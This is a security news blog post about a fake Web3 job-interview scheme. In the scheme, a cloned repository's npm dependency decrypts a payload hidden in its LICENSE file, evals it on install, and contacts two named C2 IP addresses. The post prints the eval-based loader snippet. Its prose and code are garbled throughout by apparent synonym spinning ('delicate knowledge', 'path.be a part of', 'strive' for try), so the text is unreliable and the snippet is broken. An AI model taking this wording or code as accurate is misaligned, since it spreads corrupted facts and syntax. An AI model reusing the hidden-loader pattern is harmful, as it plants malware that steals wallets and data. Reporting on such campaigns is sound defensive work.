Skip to content
  • Blog Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form

Ukrainian Web3team Weaponizing NPM Package to Attack Job Seekers and Steal Sensitive Data

Posted on August 13, 2025August 13, 2025 By CWS

A complicated cybercriminal operation disguised as a Ukrainian Web3 growth group has been focusing on job seekers by means of weaponized NPM packages, safety researchers warn.

The assault leverages faux interview processes to trick unsuspecting candidates into downloading and executing malicious code that steals cryptocurrency wallets, browser knowledge, and delicate private info.

The marketing campaign facilities round a seemingly reputable GitHub repository known as “EvaCodes-Neighborhood/UltraX,” which attackers current to potential workers throughout first-round interviews.

Victims are instructed to clone and run the repository domestically as a part of a technical evaluation. Nonetheless, the venture accommodates a malicious NPM dependency designed to reap delicate knowledge from the goal’s system.

On August 9, 2025, a group member approached SlowMist researchers after turning into suspicious of the repository’s contents throughout an interview course of.

The safety group’s subsequent evaluation revealed the presence of a backdoor embedded throughout the venture’s dependencies, confirming the malicious nature of what seemed to be a typical Web3 growth repository.

SlowMist analysts recognized that the assault initially used the NPM bundle “[email protected],” which was later changed with “[email protected]” after the unique bundle was eliminated by NPM’s safety group.

The newer bundle, revealed on August 8, 2025, accommodates closely obfuscated code designed to evade detection whereas sustaining the identical malicious performance.

The menace extends past particular person victims, because the researchers found that two further GitHub accounts had forked the malicious repository, suggesting a broader marketing campaign focusing on a number of potential victims throughout the Web3 job market.

An infection Mechanism and Code Execution

The malware’s an infection vector depends on social engineering fairly than technical exploitation, making it significantly harmful for job seekers within the aggressive Web3 house.

As soon as the sufferer clones the repository and executes “npm set up,” the malicious rtk-logger bundle mechanically triggers its payload by means of a classy multi-stage course of.

malicious code location (Supply – Medium)

The bundle’s core malicious code resides in “/rtk-logger/lib/utils/smtp-connection/index.js,” which makes use of AES-256-CBC decryption to unlock obfuscated payloads saved within the LICENSE file.

The decryption course of employs hardcoded keys and initialization vectors, permitting the malware to execute with out further community communication throughout preliminary deployment.

const fs = require(‘fs’);
const path = require(‘path’);
const parseLib = require(‘./parse’)
const filePath = path.be a part of(__dirname, ‘LICENSE’);
fs.readFile(filePath, ‘utf8’, (_, knowledge) => {
strive {
eval(parseLib(knowledge))
} catch (err) {
console.error(‘Error throughout parsing/eval:’, err);
}
})

After profitable decryption, the malware establishes connections to command-and-control servers at 144.172.112.106 and 172.86.64.67, enabling distant entry and knowledge exfiltration capabilities whereas sustaining persistence by means of varied system-level modifications.

Enhance your SOC and assist your group defend your enterprise with free top-notch menace intelligence: Request TI Lookup Premium Trial.

Cyber Security News Tags:Attack, Data, Job, NPM, Package, Seekers, Sensitive, Steal, Ukrainian, Weaponizing, Web3team

Post navigation

Previous Post: What is MCP Server – How it is Powering AI-Driven Cyber Defense
Next Post: Fortinet, Ivanti Release August 2025 Security Patches

Related Posts

Aembit Extends Secretless CI/CD with Credential Lifecycle Management for GitLab Cyber Security News
Swedish Power Grid Operator Confirms Data Breach Following Everest Ransomware Gang Claim Cyber Security News
Cisco ASA 0-Day RCE Vulnerability Actively Exploited in the Wild Cyber Security News
Cloudflare Confirms Data Breach, Hackers Stole Customer Data from Salesforce Instances Cyber Security News
Detego Global Launches Case Management Platform for Digital Forensics and Incident Response Teams Cyber Security News
4.3 Million Chrome and Edge Users Hacked in 7-Year ShadyPanda Malware Campaign Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • China-Linked Hackers Exploit VMware ESXi Zero-Days to Escape Virtual Machines
  • xRAT Malware Attacking Windows Users Disguised as Adult Game
  • Fog Ransomware Attacking US Organizations Leveraging Compromised VPN Credentials
  • In Other News: 8,000 Ransomware Attacks, China Hacked US Gov Emails, IDHS Breach Impacts 700k
  • Threat Actors Attacking Systems with 240+ Exploits Before Ransomware Deployment

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • January 2026
  • December 2025
  • November 2025
  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • China-Linked Hackers Exploit VMware ESXi Zero-Days to Escape Virtual Machines
  • xRAT Malware Attacking Windows Users Disguised as Adult Game
  • Fog Ransomware Attacking US Organizations Leveraging Compromised VPN Credentials
  • In Other News: 8,000 Ransomware Attacks, China Hacked US Gov Emails, IDHS Breach Impacts 700k
  • Threat Actors Attacking Systems with 240+ Exploits Before Ransomware Deployment

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Copyright © 2026 Cyber Web Spider Blog – News.

Powered by PressBook Masonry Dark